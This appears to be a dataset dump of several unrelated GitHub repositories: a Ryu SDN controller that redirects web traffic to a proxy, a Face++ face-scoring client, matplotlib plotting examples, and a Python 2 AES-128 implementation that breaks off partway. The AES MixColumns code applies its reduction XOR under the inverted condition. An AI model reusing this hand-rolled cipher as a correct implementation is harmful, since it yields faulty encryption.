self.ip_to_mac.setdefault(web_proxy)\n\n # detect mac of host_proxy web_server and web_proxy\n flag = False\n while not flag:\n flag = True\n for ip_addr in self.ip_to_mac.keys():\n if not self.ip_to_mac[ip_addr]:\n flag = False\n if flag:\n break\n for ip_addr in self.ip_to_mac.keys():\n if not self.ip_to_mac[ip_addr]:\n self.detect_mac(ip_addr)\n hub.sleep(3)\n\n ofproto = ofproto_v1_3\n parser = ofproto_v1_3_parser\n # install flow-entry prevent common host from visiting web_proxy\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ipv4_dst=web_proxy,\n ip_proto=inet.IPPROTO_TCP, tcp_dst=80)\n actions = []\n self.add_flow(\n self.web_server_dp, 5, match, actions=actions, table_id=0)\n print \"install flow-entry: prevent host derectly visit web_proxy(%s) \\\n on switch %s\" % (web_proxy, self.web_server_dp.id)\n\n hub.sleep(20)\n # install rederict flow-enty that flow src_ip is host_proxy\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ipv4_src=host_proxy, ipv4_dst=web_server,\n ip_proto=inet.IPPROTO_TCP, tcp_dst=80)\n set_proxy_mac_dst = parser.OFPActionSetField(\n eth_dst=self.ip_to_mac[web_proxy])\n set_proxy_ip_dst = parser.OFPActionSetField(ipv4_dst=web_proxy)\n actions = [set_proxy_mac_dst, set_proxy_ip_dst]\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions),\n parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(self.web_server_dp, 10, match, table_id=0, inst=inst)\n\n # install rederict flow-enty that flow src_ip is web_proxy\n match = parser.OFPMatch(\n eth_type=ether.ETH_TYPE_IP, ipv4_src=web_proxy, ipv4_dst=host_proxy,\n ip_proto=inet.IPPROTO_TCP, tcp_src=80)\n set_server_mac_src = parser.OFPActionSetField(\n eth_src=self.ip_to_mac[web_server])\n set_server_ip_src = parser.OFPActionSetField(ipv4_src=web_server)\n actions = [set_server_mac_src, set_server_ip_src]\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions),\n parser.OFPInstructionGotoTable(table_id=1)]\n self.add_flow(self.web_server_dp, 10, match, table_id=0, inst=inst)\n\n # send detect_arp request to acquire host_proxy web_server\n # and web_proxy mac\n def detect_mac(self, ip_addr):\n pkt = packet.Packet()\n eth_r = ethernet.ethernet(ethertype=ether.ETH_TYPE_ARP,\n dst='ff:ff:ff:ff:ff:ff',\n src=detect_mac)\n arp_r = arp.arp(opcode=1, src_mac=detect_mac, src_ip=detect_ip,\n dst_mac='00:00:00:00:00:00', dst_ip=ip_addr)\n pkt.add_protocol(eth_r)\n pkt.add_protocol(arp_r)\n pkt.serialize()\n for datapath in self.dps:\n actions = [\n datapath.ofproto_parser.OFPActionOutput(port=datapath.ofproto.OFPP_FLOOD)]\n arp_request = datapath.ofproto_parser.OFPPacketOut(datapath=datapath,\n in_port=datapath.ofproto.OFPP_CONTROLLER,\n buffer_id=datapath.ofproto.OFP_NO_BUFFER,\n actions=actions,\n data=pkt.data\n )\n datapath.send_msg(arp_request)\n print \"send detect_arp request:i am %s,who is %s\" % (detect_ip, ip_addr)\n\n # recieve detect_arp reply to acquire host_proxy web_server\n # and web_proxy mac and datapath directly connecting the web_server\n def arp_reply_handler(self, msg, datapath, eth, arp):\n if (arp.opcode == 2) and (eth.dst == detect_mac):\n for ip_addr in self.ip_to_mac.keys():\n if arp.src_ip == ip_addr:\n print \"detect_arp reply:i am %s,my mac is %s\" % (ip_addr, eth.src)\n self.ip_to_mac[ip_addr] = eth.src\n if arp.src_ip == web_server:\n self.web_server_dp = datapath\n print \"i am web_server,ip is %s, derectly connect switch(dpid:%s)\" % (web_server, datapath.id)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n # If you hit this you might want to increase\n # the \"miss_send_length\" of your switch\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocols(ethernet.ethernet)[0]\n dst = eth.dst\n src = eth.src\n\n # handle arp to learn mac and datapath directly\n if(eth.ethertype == ether.ETH_TYPE_ARP):\n arp_r = pkt.get_protocol(arp.arp)\n if (arp_r.src_ip == detect_ip) or (arp_r.dst_ip == detect_ip):\n self.arp_reply_handler(\n msg, datapath, eth, pkt.get_protocol(arp.arp))\n # return to prenvent from detect ip flood\n return\n\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n\n self.logger.info(\"packet in %s %s %s %s\", dpid, src, dst, in_port)\n\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n\n # install a flow to avoid packet_in next time\n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst)\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n if msg.buffer_id != ofproto.OFP_NO_BUFFER:\n self.add_flow(datapath, 1, match, actions, table_id=1,\n idle_timeout=10, hard_timeout=10, buffer_id=msg.buffer_id)\n else:\n self.add_flow(datapath, 1, match, actions, table_id=1,\n idle_timeout=10, hard_timeout=10)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n if (out_port == ofproto.OFPP_FLOOD) or (msg.buffer_id == ofproto.OFP_NO_BUFFER):\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n datapath.send_msg(out)\n" } ]
4
qzylalala/FaceScoring
https://github.com/qzylalala/FaceScoring
7acad44c70b829f286778e52c50b7e2586d091fc
2e18268e997060f1be0a4eb86aa9893823a9e2b4
2aa66e8adb105205532ae4a05158265e66d9ed70
refs/heads/master
2022-12-08T18:27:59.008570
2020-09-14T12:35:47
2020-09-14T12:35:47
295,409,138
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5606468915939331, "alphanum_fraction": 0.5822102427482605, "avg_line_length": 35.591548919677734, "blob_id": "aed77e90fe6492d65e911d0147254f7dfff006ae", "content_id": "d3030e29ce0e4ec52ab9dc86357738a3510047e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2597, "license_type": "permissive", "max_line_length": 144, "num_lines": 71, "path": "/FaceppApi.py", "repo_name": "qzylalala/FaceScoring", "src_encoding": "UTF-8", "text": "# -*-coding:utf-8-*-\n'''\n@author : qzylalala\n@file : FaceppApi.py\n@time : 2020-09-07 19:04\n'''\nimport urllib.request\nimport urllib.error\nimport json\nimport time\n\n\nhttp_url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'\nkey = \"xxx\"\nsecret = \"xxx\"\n# use your own key and secret key\n\n#---------------------------------------------------------------------------------------------------#\ndef get_info(file_path):\n boundary = '----------%s' % hex(int(time.time() * 1000))\n data = []\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_key')\n data.append(key)\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'api_secret')\n data.append(secret)\n data.append('--%s' % boundary)\n fr = open(file_path, 'rb')\n data.append('Content-Disposition: form-data; name=\"%s\"; filename=\" \"' % 'image_file')\n data.append('Content-Type: %s\\r\\n' % 'application/octet-stream')\n data.append(fr.read())\n fr.close()\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_landmark')\n data.append('1')\n data.append('--%s' % boundary)\n data.append('Content-Disposition: form-data; name=\"%s\"\\r\\n' % 'return_attributes')\n data.append(\n \"gender,age,smiling,headpose,facequality,blur,eyestatus,emotion,ethnicity,beauty,mouthstatus,eyegaze,skinstatus\")\n data.append('--%s--\\r\\n' % boundary)\n\n for i, d in enumerate(data):\n if isinstance(d, str):\n data[i] = d.encode('utf-8')\n\n http_body = b'\\r\\n'.join(data)\n\n # build http request\n req = urllib.request.Request(url=http_url, data=http_body)\n\n # header\n req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)\n\n try:\n # post data to server\n resp = urllib.request.urlopen(req, timeout=5)\n # get response\n qrcont = resp.read()\n # if you want to load as json, you should decode first,\n # for example: json.loads(qrount.decode('utf-8'))\n face_attr = json.loads(qrcont.decode('utf-8'))\n dict = face_attr[\"faces\"][0]['attributes']\n # print(dict)\n print(dict['gender']['value'])\n print(dict['age']['value'])\n print(dict['beauty']['male_score'] + 10)\n print(dict['beauty']['female_score'] + 10)\n # 'emotion': {'anger': 0.19, 'disgust': 0.017, 'fear': 0.003, 'happiness': 0.003, 'neutral': 99.532, 'sadness': 0.25, 'surprise': 0.005}\n except urllib.error.HTTPError as e:\n print(e.read().decode('utf-8'))" }, { "alpha_fraction": 0.6962552070617676, "alphanum_fraction": 0.7184466123580933, "avg_line_length": 17.461538314819336, "blob_id": "764973d315235c9f1adb2b0e5c379b53bdb26c95", "content_id": "9748779be7ac53d614fe389b9bf9e03c5c8f6148", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1203, "license_type": "permissive", "max_line_length": 143, "num_lines": 39, "path": "/README.md", "repo_name": "qzylalala/FaceScoring", "src_encoding": "UTF-8", "text": "## Face_detection and Face_scoring\n\n### 文件组成\n\n```markdown\n两个人脸检测的库(不用管):\n\t1. dlib_face_recognition_resnet_model_v1.dat\n\t2. shape_predictor_68_face_landmarks\n\n代码部分\n\t3. GetFace.py (利用上面两个库, 调用摄像头资源进行打分)\n \t4. FaceppApi.py (调用face++的 API, 进行人脸打分)\n \n文件保存\n\t5. faces文件夹保存获取的图像\n```\n\n\n\n### 使用说明\n\n```markdown\n注意事项\n1. 路径使用的是相对路径, 应该不会有问题\n2. GetFace.py import 了 FaceppApi。 因此直接运行GetFace.py即可\n3. 注意, 每次运行程序默认都是从 person1 开始(这里不懂看代码), 因此,尽量只运行一次。若要运行多次,则必须\t删除原来faces文件夹中的所有图片(放在别的地方也行,保证faces文件夹为空即可)\n\n\n使用说明\n4. 运行 GetFace.py 稍等一会儿就会调用摄像头资源. 首先按 N 键 创建文件夹(每个人单独一个文件夹,在faces\t内部) , 摆好姿势后, 按 S 键存储当前图片, 稍等片刻即可输出识别结果(gender, age, male_socre, \tfemale_socre)\n```\n\n\n\n### 环境依赖\n\n``` markdown\nAnaconda3.7 + dlib + cv2 + numpy + urllib + json\n```\n\n" } ]
2
szczepanski/python-matplotlib
https://github.com/szczepanski/python-matplotlib
68414833c6a8defb83bb5d5ffc229bd8deb7bc21
57b20ad2e90fc4d6dfd54c67bc1f564bdd830bf3
f15650d2149bbfb847b2b73ace37d71c7a2b9a6c
refs/heads/master
2020-03-08T14:51:48.059742
2018-07-05T07:33:23
2018-07-05T07:33:23
128,196,260
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5860113501548767, "alphanum_fraction": 0.6606805324554443, "avg_line_length": 20.353534698486328, "blob_id": "8455f3bdbfb2232879477a17f0de7deddaa88892", "content_id": "a8caf1c10c4bc455836211c2434598143e4b161d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2116, "license_type": "no_license", "max_line_length": 93, "num_lines": 99, "path": "/README.md", "repo_name": "szczepanski/python-matplotlib", "src_encoding": "UTF-8", "text": "Piotr Szczepanski\n\n# python-matplotlib\n<br>\nReferences:\n\nhttps://www.udemy.com/data-visualization-with-python-and-matplotlib/learn/v4/content\n<br>\n<br>\n<br>\n# python-matplotlib\n\n## Basic Graph\n\n```python\n#!/usr/bin/env python\n# basic 2 plot graph\nimport matplotlib.pyplot as plt\n\n# 1st plot\nx1 = [1, 2, 3, 4, 5]\ny1 = [6, 7, 4, 5, 2]\n\n# 2nd plot\nx2 = [2, 4, 7, 3, 4]\ny2 = [3, 3, 4, 6, 4]\n\n# 3rd argument - label name => to be used in legend\nplt.plot(x1, y1, label='1st plot')\nplt.plot(x2, y2, label='2nd plot')\n\nplt.title('Basic Graph \\n'\n 'with a new line subtitle')\nplt.xlabel('x axis label')\nplt.ylabel('y axis label')\nplt.legend()\nplt.show()\n\n```\n## Basic bar chart\n\n```python\n#!/usr/bin/env python\n# basic 2 plot bar chart\nimport matplotlib.pyplot as plt\n\n# 1st plot\nx1 = [1, 2, 3, 4, 5]\ny1 = [6, 7, 4, 5, 2]\n\n# 2nd plot\nx2 = [2, 4, 7, 3, 6]\ny2 = [3, 3, 4, 6, 4]\n\n# 3rd argument - label name => to be used in legend\nplt.bar(x1, y1, label = '1st plot', color = 'g')\nplt.bar(x2, y2, label = '2nd plot', color = 'r')\n\nplt.title('Basic Bar chart\\n with a new line subtitle')\nplt.xlabel('x axis label')\nplt.ylabel('y axis label')\nplt.legend()\nplt.show()\n\n```\n## Basic automated bar chart - for larger data sets\n\n```python\n#!/usr/bin/env python\n# basic automated bar chart with larger data set\nimport matplotlib.pyplot as plt\ndata_set = [10,22,32,45,15,99,63,56,23,89,55,43,17,93,24]\nx= [x for x in range(len(data_set))]\n\nplt.bar(x, data_set)\nplt.show()\n```\n## Basic histogram chart with bins option - containers - grouping\n\n```python\n#!/usr/bin/env python\n# basic histogram chart with larger data set and bins option - containers - grouping\n\nimport matplotlib.pyplot as plt\n\n# data_set values all above 40\ndata_set = [41,77,88,44,45,55,99,63,56,99,89,55,43,78,93,49]\n\n# bins serve a function of containers in this case for all values in data set (all are >= 40)\nbins = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\n# cumulative=True - sort bars in ascending order, rwidth - bar width\nplt.hist(data_set, bins, histtype='bar', cumulative=True, rwidth=0.8)\nplt.show()\n```\n\n## Styles with matplotlib\n\n## Alpha transparent\n\n" }, { "alpha_fraction": 0.6294430494308472, "alphanum_fraction": 0.6498740315437317, "avg_line_length": 43.63750076293945, "blob_id": "6a864205907139b3831a5574cada7f991b6a2fee", "content_id": "f515b64227582611fd5c0cad28ec1f19a5f193fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3573, "license_type": "no_license", "max_line_length": 123, "num_lines": 80, "path": "/bar_plot_1.py", "repo_name": "szczepanski/python-matplotlib", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n\ndata_set = np.loadtxt(open(\"/Users/piotr/projects/python/2x/matplotlib_testing/data_set\"),\n dtype={\n 'names': ('traffic_class','y_axis_values','x_axis_label','y_axis_label','title'),\n 'formats': ('|S150', np.float, '|S150', '|S150', '|S150')},\n delimiter=',', unpack=True,skiprows=1)\n\n\ncolors = [u'indigo', u'gold', u'firebrick', u'indianred', u'yellow', u'darkolivegreen', u'darkseagreen',u'midnightblue',\n u'darkorange', u'darkslategrey', u'mediumvioletred', u'mediumorchid', u'mediumslateblue',u'salmon',u'pink',\n u'black', u'springgreen', u'orange', u'brown', u'turquoise', u'olivedrab',u'slategrey',u'peachpuff',u'dimgray',\n u'cyan', u'silver', u'skyblue', u'gray', u'darkturquoise', u'goldenrod', u'darkgreen', u'darkviolet',\n u'darkgray', u'teal', u'darkmagenta', u'yellowgreen',u'blueviolet',u'y', u'mediumaquamarine', u'darkorchid',\n u'thistle', u'violet', u'navy', u'dimgrey', u'orchid', u'blue',u'cornflowerblue', u'palegoldenrod',\n u'darkblue', u'coral', u'darkkhaki', u'mediumpurple', u'red', u'bisque', u'slategray',u'hotpink',u'm',\n u'darkcyan',u'khaki', u'wheat', u'deepskyblue', u'rebeccapurple', u'darkred', u'steelblue',u'tomato',\n u'gainsboro', u'c', u'mediumturquoise', u'g', u'k', u'purple', u'burlywood', u'darksalmon',u'powderblue',\n u'greenyellow', u'royalblue', u'sienna', u'orangered', u'lime', u'palegreen', u'mistyrose', u'seashell',\n u'mediumspringgreen', u'fuchsia', u'chartreuse', u'blanchedalmond', u'peru', u'aquamarine',\n u'darkslategray', u'darkgoldenrod', u'lawngreen', u'chocolate', u'crimson',u'seagreen', u'mediumblue',\n u'forestgreen', u'darkgrey', u'olive', u'b', u'moccasin',u'green', u'paleturquoise',\n u'limegreen', u'saddlebrown', u'grey', u'darkslateblue', u'r', u'deeppink', u'plum',u'rosybrown',\n u'cadetblue', u'dodgerblue', u'maroon', u'sandybrown', u'aqua', u'magenta', u'tan',u'palevioletred',\n u'mediumseagreen', u'slateblue']\n\n# y - data_set\ny = data_set[1]\n\n# x - 0 to the length of dataset(y)\nx = [x for x in range(1, len(y)+1)]\n\n# Legend - names\nlegend_names = data_set[0]\n\nx_axis_label = data_set[2][0]\ny_axis_label = data_set[3][0]\nplot_title = data_set[4][0]\n\nfig = plt.figure()\n\n\nax1 = plt.subplot2grid((8,5), (0,0), rowspan=6, colspan=5)\nax1.set_facecolor('white')\nax1.spines['left'].set_color('lightgrey')\nax1.spines['bottom'].set_color('lightgrey')\nax1.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.set_xticks(x)\n\n\nax1.set_title(plot_title)\nfor index, val in enumerate(y):\n ax1.bar(x[index], y[index], 1, label=legend_names[index], alpha=0.5, color=random.sample(colors, 30))\nfor a,b in zip(x, y):\n plt.text(a, b, str(b), ha='center', color='grey')\nax1.set_xlabel(x_axis_label)\nax1.set_ylabel(y_axis_label)\n\n\nax2 = plt.subplot2grid((8, 5), (6, 0), rowspan=2, colspan=5)\nax2.set_facecolor('white')\nax2.spines['left'].set_visible(False)\nax2.spines['bottom'].set_visible(False)\nax2.spines['top'].set_visible(False)\nax2.spines['right'].set_visible(False)\nax2.set_xticks([], minor=False)\nax2.set_yticks([], minor=False)\n\nhandles, labels = ax1.get_legend_handles_labels()\nlegend = ax2.legend(handles, labels, loc='center', framealpha=0.1, ncol=4, prop={'size':8}, fancybox=True, borderaxespad=0)\nfor text in legend.get_texts():\n text.set_color(\"grey\")\n\nplt.subplots_adjust(wspace=0.2, hspace=2)\n\nplt.show()\n\n\n" } ]
2
overxfl0w/AES-128
https://github.com/overxfl0w/AES-128
b3688a9cc429392d8b6465c92aa60eda5702e36c
c22c105a50e8885ae7878eeb06b6a421b596f9b5
418ff8e76f9f4a5ae710802cacfe0002f6f935ad
refs/heads/master
2016-09-06T05:39:53.506360
2014-09-20T14:50:32
2014-09-20T14:50:32
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5291164517402649, "alphanum_fraction": 0.6394466757774353, "avg_line_length": 33.86770248413086, "blob_id": "6d35cae251e5d8ba3119487bf8794980162cc9db", "content_id": "6b501f05146fcf9643e1f826c222101defd27635", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8966, "license_type": "no_license", "max_line_length": 129, "num_lines": 257, "path": "/aes.py", "repo_name": "overxfl0w/AES-128", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" CONSTANTS \"\"\"\n\nsbox = [ 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,\n\t\t\t0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,\n\t\t\t0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,\n\t\t\t0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,\n\t\t\t0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,\n\t\t\t0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,\n\t\t\t0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,\n\t\t\t0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,\n\t\t\t0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,\n\t\t\t0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,\n\t\t\t0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,\n\t\t\t0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,\n\t\t\t0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,\n\t\t\t0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,\n\t\t\t0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,\n\t\t\t0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16]\n \nrcon = [[0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36],\n\t\t[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],\n\t\t[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],\n\t\t[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]]\n\t\t\nrgfield = [[0x02,0x03,0x01,0x01],\n\t\t [0x01,0x02,0x03,0x01],\n\t\t [0x01,0x01,0x02,0x03],\n\t\t [0x03,0x01,0x01,0x02]]\n\t\t \ncnst = 0b00011011 # Constant XOR multiplication value \n\nclass libutils:\n\t\n\t## Example of use libutils._changecolumn(antKey,[0x09,0xcf,0x4f,0x3c],0) ##\n\t@staticmethod\n\tdef _changecolumn(block,column,n): \n\t\tfor i in xrange(4):\n\t\t\tblock[i][n] = column[i]\n\t\treturn block\n\t\t\n\t## PRECONDITION n<=col(block) ##\n\t@staticmethod\n\tdef _getcolumn(block,n):\n\t\treturn [block[i][n] for i in xrange(len(block))]\n\t\n\t@staticmethod\n\tdef _getallcolumns(block):\n\t\treturn [libutils._getcolumn(block,n) for n in xrange(len(block))]\n\t\t\n\t@staticmethod\n\t## Change first byte at last byte of the column ##\n\tdef _rotword(column):\n\t\ttmp = column[0]\n\t\tfor i in xrange(len(column)-1):\n\t\t\tcolumn[i] = column[i+1]\n\t\tcolumn[len(column)-1] = tmp\n\t\treturn column\n\t\n\t@staticmethod\n\t## Make SubBytes process applied to column ##\n\tdef _subbytes(column):\n\t\treturn [sbox[i] for i in column]\n\t\n\t@staticmethod\n\t## Make SubBytes process applied to matrix ##\n\tdef _subbytesmatrix(matrix):\n\t\tfor i in xrange(len(matrix)):\n\t\t\tfor j in xrange(len(matrix)):\n\t\t\t\tmatrix[i][j] = sbox[matrix[i][j]]\n\t\treturn matrix\n\t\t\n\t@staticmethod\n\t## Xor 3 columns -> key schedule col1 xor col2 xor Rcon[i] ##\n\t## PRECONDITION len(col1) == len(col2) == len(col3) ##\n\tdef _xor3columns(col1,col2,col3):\n\t\treturn [col1[i] ^ col2[i] ^ col3[i] for i in xrange(len(col1))]\n\t\t\n\t@staticmethod\n\t## Xor 2 columns ##\n\t## PRECONDITION: len(col1) == len(col2) ##\n\tdef _xor2columns(col1,col2):\n\t\treturn [col1[i] ^ col2[i] for i in xrange(len(col1))]\n\t\n\t@staticmethod\n\t## Build matrix by columns ##\n\tdef _buildmatrixcol(*args):\n\t\tmatrix = [[0x00]*len(args) for i in xrange(len(args))]\n\t\tfor i in xrange(len(args)):\n\t\t\tlibutils._changecolumn(matrix,args[i],i)\n\t\treturn matrix\n\t\n\t@staticmethod\n\t## AddRoundKey process ##\n\t## PRECONDITION: Square matrices (4x4 in this case)\n\tdef _addroundkey(matrix1,matrix2):\n\t\tmatrix = [[0x00]*4 for i in xrange(len(matrix1))]\n\t\tfor i in xrange(len(matrix1)):\n\t\t\tmatrix = libutils._changecolumn(matrix,libutils._xor2columns(libutils._getcolumn(matrix1,i),libutils._getcolumn(matrix2,i)),i)\n\t\treturn matrix\n\t\n\t@staticmethod\n\t## Rotate fil n of matrix i times ##\n\t## Trick: << i -> pos[0] = pos[i], pos[1] = pos[(1+i)%3], pos[2] = pos[(2+i)%3], pos[3] = pos[(3+i)%3]\n\tdef _rotate(fil,n,i):\n\t\tauxfil = [p for p in fil]\n\t\tfor j in xrange(len(fil)):\n\t\t\tfil[j] = 0x00 | auxfil[(j+i)%len(fil)]\n\t\treturn fil\n\t\t\n\t@staticmethod\n\t## ShiftRows process ##\n\tdef _shiftrows(matrix):\n\t\tfor i in xrange(len(matrix)):\n\t\t\t# Rotate fil i, i times #\n\t\t\tmatrix[i] = libutils._rotate(matrix[i],i,i)\n\t\treturn matrix\n\n\n\t@staticmethod\n\t## MixColumns process ##\n\t## PRECONDITION: 8-bits elements in matrix, else it will be truncated at 8-bits or filled with zeros ##\n\tdef _mixcolumns(matrix):\n\t\tactCol = []\n\t\tacum = 0x00\n\t\tendCol = [0x00]*4\n\t\ttmp = 0x00\n\t\tfor i in xrange(len(matrix)):\n\t\t\tactCol = libutils._getcolumn(matrix,i)\n\t\t\tfor j in xrange(len(rgfield)):\n\t\t\t\tfor x in xrange(len(rgfield[j])):\n\t\t\t\t\tactCol[x] = actCol[x] & 0x000000FF # If it has more than 8-bits truncate it\n\t\t\t\t\txored = actCol[x] & 0x00000080\n\t\t\t\t\tif rgfield[j][x] == 0x01:\n\t\t\t\t\t\ttmp = actCol[x]\t\t\t\t\t\n\t\t\t\t\telif rgfield[j][x] == 0x02:\n\t\t\t\t\t\ttmp = actCol[x] << 1\n\t\t\t\t\t\tif xored != 0x00000080:\n\t\t\t\t\t\t\ttmp = tmp ^ cnst\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\telse:\t\n\t\t\t\t\t\ttmp = actCol[x] << 1\n\t\t\t\t\t\tif xored != 0x00000080:\n\t\t\t\t\t\t\ttmp = tmp ^ cnst\t\n\t\t\t\t\t\ttmp = tmp ^ actCol[x]\t\t\t\t\n\t\t\t\t\tacum = acum ^ tmp\n\t\t\t\t\tacum &= 0x000000FF\n\t\t\t\t\ttmp = 0x00\n\t\t\t\tendCol[j] = acum\n\t\t\t\tacum \t = 0x00\n\t\t\tmatrix = libutils._changecolumn(matrix,endCol,i)\n\t\treturn matrix\n\t\t\n\t\t\n\t@staticmethod\n\t## Extract round key n from schedule ##\n\t## \n\tdef _extractroundkey(schedule,n):\n\t\troundKey = [[],[],[],[]]\n\t\tfor i in xrange(len(schedule)):\n\t\t\tfor j in range(n*4,(n*4)+4):\n\t\t\t\troundKey[i].append(schedule[i][j])\n\t\treturn roundKey\n\t\t\t\t\t\n\t\nclass cipheralgorithms:\n\t\n\t@staticmethod\n\tdef _aes(*args):\n\t\tcipherText = [[0x32,0x88,0x31,0xe0],[0x43,0x5a,0x31,0x37],[0xf6,0x30,0x98,0x07],[0xa8,0x8d,0xa2,0x34]]\n\t\tcipherKey = [[0x2b,0x28,0xab,0x09],[0x7e,0xae,0xf7,0xcf],[0x15,0xd2,0x15,0x4f],[0x16,0xa6,0x88,0x3c]]\n\t\tauxBlock = [[0x00]*4]\n\t\tif args != ():\n\t\t\tcipherText = args[0]\n\t\t\tif len(args) == 2:\n\t\t\t\tcipherKey = args[1]\n\t\t# Set schedule -> we can obtain later all round keys by this matrix #\n\t\tschedule = cipheralgorithms.__keyschedule(cipherKey)\n\t\t\n\t\t###################### Show ###################### \n\t\tdef _showBlock(auxBlock):\n\t\t\tfor i in auxBlock:\n\t\t\t\tfor j in i:\n\t\t\t\t\tprint hex(j),\" \",\n\t\t\t\tprint \"\\n\"\n\t\t###################### End Show ######################\n\t\t \n\t\t# Make init AddRoundKey with cipherKey #\n\t\tauxBlock = libutils._addroundkey(cipherText,libutils._extractroundkey(schedule,0))\n\t\tprint \"First AddRoundKey: \\n\"\n\t\t_showBlock(auxBlock)\n\t\t# Make 9 main rounds #\n\t\tfor x in range(1,10):\t\n\t\t\t## SubBytes ##\n\t\t\tauxBlock = libutils._subbytesmatrix(auxBlock)\n\t\t\tprint \"Round \" + str(x) + \" SubBytes: \\n\"\n\t\t\t_showBlock(auxBlock)\n\t\t\t## ShiftRows ##\n\t\t\tauxBlock = libutils._shiftrows(auxBlock)\n\t\t\tprint \"Round \" + str(x) + \" ShiftRows: 